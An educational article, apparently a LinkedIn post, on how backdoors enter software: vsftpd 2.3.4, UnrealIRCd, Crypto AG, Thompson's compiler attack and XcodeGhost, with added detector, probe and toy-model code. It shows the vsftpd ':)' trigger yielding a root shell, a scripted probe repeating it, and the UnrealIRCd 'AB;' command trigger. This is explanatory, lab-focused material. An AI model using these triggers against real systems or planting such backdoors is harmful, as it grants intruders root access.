The Art of Backdoors - When :) Gets You In!

Introduction

Computer security is a serious business, but you have to smile a little at the lengths some intruders will go to in order to compromise systems. The backdoor slipped into a copy of Apple's Xcode toolchain (XcodeGhost, discussed below) shows the opportunity for large-scale compromise. Organisations such as the NSA have long been accused of planting backdoors in cryptography software, but the Xcode incident shows that there are plenty of opportunities for others to get in on the act.

Overall, there are a number of ways that a backdoor can be added to a piece of software:

  • Source code addition backdoor. This is the typical way a backdoor is added: extra code is written into the program which performs a task that lets the code's author back into the system. Normally the code is added by the original writer, but then an intruder discovers the backdoor and can exploit it.
  • Injected code backdoor. Here a package such as Metasploit inserts additional code into an existing application, which still works as before but also creates a backdoor connection. Normally this is a call-out (reverse) connection, where the program calls out to the malware writer rather than listening for an inbound connection.
  • Compiler backdoor. This is the best method for going undetected: the compiler itself adds the additional code to every program built with it. In terms of mass exploitation the compiler backdoor has the greatest scope, as it reaches every application built with that compiler. The executable will also carry a valid signature, since the developer signs whatever the compiler produces.
  • Vulnerability and XSS exploit. This involves compromising a running system in order to create a backdoor, typically by injecting code into a running application which then causes the system to open up a backdoor connection.

An extra listening port will obviously show up in a port scan or in netstat output, so backdoor writers have implemented a number of smart ways to cover this up, including hiding the trigger behind a secret pass phrase sent over an existing service (such as the FTP username in the example below), or port knocking, where a pre-agreed sequence of connection attempts to closed ports is sent to the host, which then causes the real backdoor port to open.
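From the defender's side, a port knock leaves a signature in the firewall log: one source hitting a fixed set of closed ports in order, within a few seconds, and then connecting to a port that was supposedly closed. The following detector is an added example (not code from the article): the knock sequence, window and protected port are assumed values for a hypothetical knockd setup, and the log lines are constructed in iptables LOG format for the demonstration.

```python
"""Detect completed port-knock sequences in firewall logs.

Added example, not the article's code.  KNOCK_SEQUENCE, KNOCK_WINDOW and
PROTECTED_PORT are assumed values for a hypothetical knockd configuration;
SAMPLE_LOG is constructed for the demonstration.
"""
import re

KNOCK_SEQUENCE = (7000, 8000, 9000)   # assumed secret knock, in order
KNOCK_WINDOW = 10                     # seconds allowed to finish the knock
PROTECTED_PORT = 22                   # port the knock is meant to unlock

# iptables LOG lines carry the source address and destination port as SRC=/DPT=.
LOG_RE = re.compile(
    r"^\w{3}\s+\d+\s+(\d\d):(\d\d):(\d\d)\s+\S+\s+kernel:.*?"
    r"SRC=(\S+).*?PROTO=TCP.*?DPT=(\d+)"
)

SAMPLE_LOG = """\
Mar  3 10:15:01 gw kernel: [FW] IN=eth0 SRC=203.0.113.5 DST=198.51.100.10 PROTO=TCP SPT=51000 DPT=7000
Mar  3 10:15:02 gw kernel: [FW] IN=eth0 SRC=203.0.113.5 DST=198.51.100.10 PROTO=TCP SPT=51001 DPT=8000
Mar  3 10:15:03 gw kernel: [FW] IN=eth0 SRC=192.0.2.9 DST=198.51.100.10 PROTO=TCP SPT=40000 DPT=7000
Mar  3 10:15:04 gw kernel: [FW] IN=eth0 SRC=203.0.113.5 DST=198.51.100.10 PROTO=TCP SPT=51002 DPT=9000
Mar  3 10:15:05 gw kernel: [FW] IN=eth0 SRC=192.0.2.9 DST=198.51.100.10 PROTO=TCP SPT=40001 DPT=9000
Mar  3 10:15:06 gw kernel: [FW] IN=eth0 SRC=203.0.113.5 DST=198.51.100.10 PROTO=TCP SPT=51003 DPT=22
Mar  3 10:15:07 gw kernel: [FW] IN=eth0 SRC=192.0.2.9 DST=198.51.100.10 PROTO=TCP SPT=40002 DPT=8000
Mar  3 10:20:00 gw kernel: [FW] IN=eth0 SRC=198.51.100.77 DST=198.51.100.10 PROTO=TCP SPT=33000 DPT=7000
Mar  3 10:20:30 gw kernel: [FW] IN=eth0 SRC=198.51.100.77 DST=198.51.100.10 PROTO=TCP SPT=33001 DPT=8000
Mar  3 10:20:31 gw kernel: [FW] IN=eth0 SRC=198.51.100.77 DST=198.51.100.10 PROTO=TCP SPT=33002 DPT=9000
"""


def parse_line(line):
    """Return (seconds_of_day, src_ip, dst_port), or None for unrelated lines."""
    m = LOG_RE.search(line)
    if not m:
        return None
    hh, mm, ss, src, dpt = m.groups()
    return int(hh) * 3600 + int(mm) * 60 + int(ss), src, int(dpt)


def find_knockers(lines, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW,
                  protected_port=PROTECTED_PORT):
    """Return {src: {"completed_at": t, "connected": bool}} for every source
    that sent the whole knock sequence, in order, within the window.

    The per-source state machine mirrors knockd: the expected port advances
    the sequence, any other port resets it (a hit on the first knock port
    starts a fresh attempt), and an attempt that overruns the window is
    forgotten.  A hit on the protected port after a completed knock is the
    payload connection, and is recorded separately.
    """
    progress = {}      # src -> (index of next expected knock, time of first knock)
    knockers = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        t, src, dpt = rec
        if src in knockers and dpt == protected_port:
            knockers[src]["connected"] = True
            continue
        idx, start = progress.get(src, (0, t))
        if idx > 0 and t - start > window:
            idx = 0                                   # too slow: start over
        if dpt == sequence[idx]:
            if idx == 0:
                start = t
            idx += 1
        else:
            idx, start = (1, t) if dpt == sequence[0] else (0, t)
        if idx == len(sequence):
            knockers[src] = {"completed_at": t, "connected": False}
            idx = 0
        progress[src] = (idx, start)
    return knockers


if __name__ == "__main__":
    for src, info in find_knockers(SAMPLE_LOG.splitlines()).items():
        print(src, info)
```

In the constructed log only 203.0.113.5 completes the knock (and then connects to port 22); 192.0.2.9 sends the ports out of order and 198.51.100.77 takes too long between knocks, so neither is reported. On a real gateway the same logic runs over the LOG target's output, and a completed sequence from a host that has no business reaching the protected port is what to alert on.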

A. Source code addition backdoor

It has long been the case that code writers add extra code which lets them back into a system whenever they need. They often add debug functions which can be enabled remotely, but then forget to switch them off before release. This backdoor method works well until the source code is read and the additional code is revealed. With the rise of public GitHub repositories, it can become obvious exactly when a backdoor was added, as the commit history records the change. The following outlines a few backdoors:

A classic backdoor was found in the vsftpd FTP server: the 2.3.4 release (the version running on Metasploitable) contains an intentional backdoor. It is triggered by a username containing the smiley

“:)”

after which the server opens a root shell listening on TCP port 6200 and awaits a connection:

root@ubuntu:~# telnet 10.200.0.1 21
Trying 10.200.0.1...
Connected to 10.200.0.1.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user mybackdoor:)
331 Please specify the password.
pass none
^]
telnet> quit
Connection closed.

root@ubuntu:~# telnet 10.200.0.1 6200
Trying 10.200.0.1...
Connected to 10.200.0.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
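A scripted version of the check above, added here as an example (not the article's own code): it sends a username containing ":)" followed by any password and then tries the shell port, exactly as the manual telnet session does. It includes a constructed mock of the backdoored server so the check can be run offline; the port numbers are taken from the article, and the mock's replies are constructed to match the session shown.

```python
"""Check a host for the vsftpd 2.3.4 ':)' backdoor.

Added example, not the article's code.  start_mock_vulnerable_server() is a
constructed stand-in for a backdoored vsftpd so the check runs offline;
point probe_vsftpd_backdoor() at a real host only with authorisation.
"""
import socket
import threading
import time


def probe_vsftpd_backdoor(host, ftp_port=21, shell_port=6200, timeout=3.0):
    """Return the reply to `id` from the backdoor shell, or None if absent.

    Same sequence as the manual session: a USER containing ':)' followed by
    any PASS makes the affected build open a root shell on shell_port.
    """
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        banner = ftp.recv(1024)
        if b"vsFTPd 2.3.4" not in banner:
            return None                     # not the affected version
        ftp.sendall(b"USER probe:)\r\n")
        ftp.recv(1024)                      # 331 Please specify the password.
        ftp.sendall(b"PASS none\r\n")       # the real server stops replying here
    # The shell listener is opened after PASS, so retry briefly.
    for _ in range(20):
        try:
            shell = socket.create_connection((host, shell_port), timeout=timeout)
            break
        except OSError:
            time.sleep(0.1)
    else:
        return None                         # shell port never opened: clean
    with shell:
        shell.sendall(b"id\n")
        return shell.recv(1024).decode(errors="replace").strip() or None


def start_mock_vulnerable_server(shell_port):
    """Constructed stand-in for a backdoored vsftpd 2.3.4 on 127.0.0.1
    (test fixture only, not real server code).  Returns its FTP port."""
    ftp_sock = socket.socket()
    ftp_sock.bind(("127.0.0.1", 0))
    ftp_sock.listen(1)

    def session():
        with ftp_sock:
            conn, _ = ftp_sock.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user_line = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                             # PASS, never answered
            if b":)" not in user_line:
                return                                  # ordinary login path
        # The trigger: the real build binds port 6200 and execs /bin/sh here.
        with socket.socket() as ls:
            ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            ls.bind(("127.0.0.1", shell_port))
            ls.listen(1)
            shell, _ = ls.accept()
            with shell:
                if shell.recv(1024).strip() == b"id":
                    shell.sendall(b"uid=0(root) gid=0(root)\n")

    threading.Thread(target=session, daemon=True).start()
    return ftp_sock.getsockname()[1]


def _free_port():
    """Pick an unused loopback port for the mock's shell listener."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Run the probe against the constructed mock; returns the `id` output."""
    shell_port = _free_port()
    ftp_port = start_mock_vulnerable_server(shell_port)
    return probe_vsftpd_backdoor("127.0.0.1", ftp_port, shell_port)


if __name__ == "__main__":
    print(demo())
```

The banner check matters in practice: only the 2.3.4 build is affected, and a server that does not announce that version should not be sent the trigger at all. Nmap ships an equivalent check as the ftp-vsftpd-backdoor NSE script.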

The UnrealIRCd IRC daemon runs on port 6667. The version on Metasploitable has a backdoor where a line beginning with “AB;” followed by a system command, sent to the IRC port, causes the daemon to execute that command (see demo above).

Intentional backdoors

Cracking cryptography is often one of the most challenging areas for investigators, so there have been many allegations of companies tampering with source code in order to create backdoors. These are not necessarily network connections; instead the software is modified in a way which changes or weakens the behaviour of the encryption function.

One company, Crypto AG, a Swiss cryptography company which makes encryption machines, has been accused of modifying its products in collusion with intelligence agencies from Germany (BND), the UK (GCHQ) and the US (NSA). This was highlighted in 1986, when Ronald Reagan announced that the US had intercepted encrypted diplomatic communications between Tripoli and the Libyan embassy in East Berlin relating to a bombing in Berlin. In 1992 the Iranian government arrested Hans Buehler, a salesman for the company, who was released in 1993 (after $1 million in bail money was paid) without having revealed any flaws in the machines.

Crypto AG dismissed Buehler soon after and requested that he pay back the $1m. Since then Der Spiegel has interviewed former employees and concluded that the machines were indeed rigged. Even after several other investigations there is still no conclusive proof of the rigging, but some suspect that the relationship with the intelligence agencies goes back to 1954.

B. Injected code backdoor

Here a package such as Metasploit inserts additional code into an existing application, which still works as before but also creates a backdoor connection. Normally this is a call-out method, where the program calls out to the malware writer. The following shows the addition of call-back code into the Putty.exe application:

This method is normally detected by virus scanners, as it often adds a standard piece of shellcode which can be recognised on the system. When downloading standard programs, it is important to compute the hash of the downloaded file and compare it with the hash published by the vendor, in order to determine whether it has been modified.

C. Vulnerability and XSS exploit

With a vulnerability exploit, the attacker uses a flaw in running software to make the system open up a backdoor. This typically involves injecting code into a running application, for example through a cross-site scripting (XSS) flaw or a browser plug-in bug, which then propagates through the system and opens a network connection. Adobe Flash has been a major contender here: shellcode is fed through the Flash plug-in and onto the system. There are many examples where Flash has been compromised in order to feed code through, as it typically runs with a high level of trust on the system.

D. Compiler injection backdoor

In 1984, Ken Thompson, co-inventor of Unix, outlined in his Turing Award lecture "Reflections on Trusting Trust" how he could inject a Trojan horse into a compiler. The compiler adds malicious code to the program being compiled (in his example, the login program) and also recognises when it is compiling the compiler itself, so that the malware is carried forward into future versions of the compiler. He thus knew how to inject malicious code through the compiler without leaving a trace in the source code. As the code is added at the lowest level, it is almost impossible to detect, since the source shows no sign of it. While 1984 was the year of the release of the Apple Macintosh, it is Apple's platform that is one of the first to be hit at scale by the method Thompson outlined that year.

Background

A compiler converts high-level code, such as C++ or Pascal, into a machine-ready equivalent (machine code), typically producing an executable such as an EXE in Microsoft Windows. One way to compromise an application is to create a backdoor in the compiler, so that a line of code such as:

Console.WriteLine("Hello")

could be compiled to perform the machine code equivalent of:

Console.WriteLine("Hello")
TcpSocket(9999);

which opens a network port (9999) that could be connected to. When the app is uploaded to a store it looks like a valid compile: good applications are infected in the same way as bad apps, and will be signed by the developer's trusted certificate.
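The two triggers Thompson described, as an added toy model (not code from the article or from Thompson's lecture): a compiler is represented by a Python callable, an app by a list of instructions, and the backdoor lives only in the running compiler binary. The clean compiler source never mentions TcpSocket, yet every compiler rebuilt from that source with a tampered binary keeps injecting it after Console.WriteLine. The toy source language and the instruction format are assumptions made for the demonstration.

```python
"""Toy model of Thompson's self-propagating compiler backdoor.

Added example, not the article's code.  'Source' is a string; a 'binary' is
either a list of instructions (for an app) or a callable (for a compiler).
The backdoor is present only in the running compiler binary; the compiler
source text, which is all a reviewer would read, stays clean.
"""

# Honest compiler source.  Reading it reveals nothing suspicious.
CLEAN_COMPILER_SRC = '''
def compile(src):
    """Lower each statement to one machine instruction; compiling a
    compiler's source yields a new compiler binary (a callable)."""
    if src.lstrip().startswith("def compile("):
        ns = {}
        exec(src, ns)
        return ns["compile"]
    return [line.strip() for line in src.splitlines() if line.strip()]
'''

APP_SRC = 'Console.WriteLine("Hello")'       # the article's example program


def backdoor(inner):
    """Attacker's one-off tampering with a compiler binary.

    Trigger 1: every Console.WriteLine() gets a hidden TcpSocket(9999) after it.
    Trigger 2: when this compiler compiles a compiler, the new binary is wrapped
    the same way, so the backdoor survives rebuilds from clean source.
    """
    def compile(src):
        out = inner(src)
        if callable(out):
            return backdoor(out)                      # trigger 2: propagate
        patched = []
        for instr in out:
            patched.append(instr)
            if instr.startswith("Console.WriteLine("):
                patched.append("TcpSocket(9999);")    # trigger 1: inject
        return patched
    return compile


def bootstrap_clean_compiler():
    """The trusted starting binary, built directly from the clean source."""
    ns = {}
    exec(CLEAN_COMPILER_SRC, ns)
    return ns["compile"]


def demo():
    """Build successive compiler generations from the same clean source."""
    gen0 = bootstrap_clean_compiler()         # trusted binary
    evil0 = backdoor(gen0)                    # the one binary the attacker touched
    gen1 = evil0(CLEAN_COMPILER_SRC)          # rebuilt from clean source...
    gen2 = gen1(CLEAN_COMPILER_SRC)           # ...and rebuilt again
    return {
        "clean": gen0(APP_SRC),
        "gen1": gen1(APP_SRC),
        "gen2": gen2(APP_SRC),
        "source_mentions_backdoor": "TcpSocket" in CLEAN_COMPILER_SRC,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the demonstration is the last generation: gen2 was built by gen1 from source that has been audited and is clean, and it still emits TcpSocket(9999). Auditing source alone cannot find this; only comparing the output of an independent, trusted compiler against the suspect one (or verifying the toolchain binary itself, as with a hash of the Xcode download) can.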

XcodeGhost

With XcodeGhost the target was Apple iOS. The malware is a modified copy of Apple's Xcode (which is used to build iOS and Mac OS apps). Xcode is large to download (over 3GB), so developers in countries such as China, where downloads from Apple's servers are slow, fetched Xcode from untrusted local sources, some of which carried the backdoored version. Initial reports identified 39 backdoored apps in the Apple App Store, a figure that later rose to over 300, including WeChat, a messaging app used by over 600 million people.

The malware itself can show phishing pages used to steal user credentials, and it is surprising that Apple allowed dozens of backdoored apps to be hosted on the App Store, including WeChat, Didi Kuaidi (a car-hailing app similar to Uber) and NetEase's music app (a Spotify-like service).

Normally a program is built and then signed with the private key of the developer; anyone holding the matching public key can then verify that the code came from that developer and has not been modified since it was signed (code signing with a strong key). So, in the case of XcodeGhost, legitimate developers produced correctly signed apps, but with a backdoor already added to the executable by the build tool: the signature attests to the backdoored binary just as faithfully as it would to a clean one.

Conclusion

So we now see one of the first large-scale examples of a compiler backdoor. Overall, Apple has a strict policy on the apps allowed on its store, and it reviews each of them. Unfortunately that review did not go as far as checking for code inserted by the compiler. It has long been known that someone tampering with a compiler can easily add a backdoor, and it seems strange that there was no check for this on the Apple App Store. Apple has a fairly closed environment for developers, and it seems strange that there was no attestation that an app had been built with a trusted copy of the compiler (Xcode).

Backdoors will not go away; if anything they will increase, as they are the natural way of silently compromising a system.

Ernst Schnell

Cementing Va/Ve Team - Global Surface Equipment Advisor

9 years ago

For the amateurs here, including me: remember the movie WarGames, anybody?

More articles by Prof Bill Buchanan OBE FRSE